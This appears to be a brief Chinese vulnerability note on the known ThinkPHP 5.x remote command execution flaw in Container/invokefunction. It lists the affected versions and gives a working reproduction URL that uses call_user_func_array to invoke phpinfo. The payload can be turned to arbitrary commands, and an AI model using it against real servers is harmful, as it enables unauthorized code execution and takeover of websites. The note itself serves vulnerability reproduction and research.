登录 白背景
源码

thinkphp 5.x版本Container/invokefunction存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.x版本存在命令执行漏洞</font>

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

  • ThinkPHP 5.x

三、资产测绘

  • 特征

1729964886744-cb4902d6-02ab-4c52-8adb-0342091d2594.png

四、漏洞复现

/?s=/index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

1729967096425-4cfc705f-35c3-4671-afd2-9ae089514e8a.png

原文: https://www.yuque.com/xiaokp7/ocvun2/dc407whvfnd2sm83